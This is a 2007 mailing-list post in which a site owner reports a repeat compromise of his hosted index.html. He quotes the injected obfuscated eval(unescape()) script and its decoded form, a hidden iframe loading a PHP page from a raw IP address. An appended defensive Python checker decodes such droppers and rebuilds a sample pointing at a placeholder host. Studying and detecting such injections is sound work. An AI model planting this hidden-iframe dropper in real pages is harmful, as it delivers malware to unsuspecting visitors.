[ale] I've been hacked!

Jim Lynch ale_nospam at fayettedigital.com
Wed Nov 21 06:57:14 EST 2007


Last summer I received notification from Google that a web page on one 
of my web hosting accounts was infected with some sort of malware bug. 

This account only has ftp access so I changed the password for the one 
and only ftp account and removed the offending code from my index.html 
file.  I also added a cron job to another site to compare a good 
index.html with the one on the site that had been hacked in case they 
came back.

They did.

Today I received a message that said the compare failed and found the 
following at the top of the body in my index.html file:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
</script>

That script, unescaped looks like:

window.status='Done';document.write('<iframe name=7b73 
src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
width=351 height=133 style=\'display: none\'></iframe>')

Has anyone seen anything like this before?  I wonder what sort of evil 
function it might perform?

I also wonder how they got access the second time?  I went through the 
cgi scripts on that system to be sure they were mine. There aren't any 
php files on the system.

I attempted to look up the IP address but nslookup said it didn't exist, 
however it pings and the index.html file from it is the default apache2 
index file.  I suspect that system has been hacked as well.

Note the incident from last summer was a different one.

Thanks,
Jim.
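An added example, not from Jim's post or the list: a small checker that does what his cron compare does (report lines that are not in a known-good copy) and goes one step further by decoding any eval(unescape("...")) blob it finds, so the hidden iframe and its src show up in plain text. The sample page and the placeholder host are constructed here; only the structure of the script mirrors the one quoted above.

```python
"""Detect eval(unescape(...)) droppers in HTML and decode them (added example)."""
import re
from urllib.parse import quote

# eval(unescape("...")) with the percent-encoded payload captured in group 1
EVAL_UNESCAPE = re.compile(
    r'eval\s*\(\s*unescape\s*\(\s*["\']([^"\']*)["\']\s*\)\s*\)', re.I)
HIDDEN_IFRAME = re.compile(r'<iframe[^>]*display:\s*none', re.I)
IFRAME_SRC = re.compile(r"""src=\\?['"]?([^'"\\\s>]+)""", re.I)

def js_unescape(text):
    """Decode like JavaScript's unescape(): %XX bytes and %uXXXX code units."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})', repl, text)

def find_injected_scripts(html):
    """One finding per eval(unescape()) block: decoded text, iframe src, hidden flag."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(html):
        decoded = js_unescape(m.group(1))
        src = IFRAME_SRC.search(decoded)
        findings.append({
            "decoded": decoded,
            "iframe_src": src.group(1) if src else None,
            "hidden_iframe": bool(HIDDEN_IFRAME.search(decoded)),
        })
    return findings

def lines_added(baseline_html, live_html):
    """What the cron compare flags: lines in the live copy that the good copy lacks."""
    known = set(baseline_html.splitlines())
    return [ln for ln in live_html.splitlines() if ln not in known]

# Constructed sample with the same shape as the injected script in the post;
# the host is a placeholder, not the address from the message.
_DROPPER = ("window.status='Done';document.write('<iframe name=7b73 "
            "src=\\'http://dropper.example.invalid/images/frt.php?'"
            "+Math.round(Math.random()*46683)+'a9b\\' width=351 height=133 "
            "style=\\'display: none\\'></iframe>')")
GOOD_HTML = "<html>\n<body>\n<p>Welcome</p>\n</body>\n</html>\n"
INFECTED_HTML = GOOD_HTML.replace(
    "<body>\n",
    '<body>\n<script>eval(unescape("' + quote(_DROPPER, safe="") + '"));</script>\n')

if __name__ == "__main__":
    for f in find_injected_scripts(INFECTED_HTML):
        print("hidden iframe:", f["hidden_iframe"], "src:", f["iframe_src"])
    print("lines not in baseline:", lines_added(GOOD_HTML, INFECTED_HTML))
```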
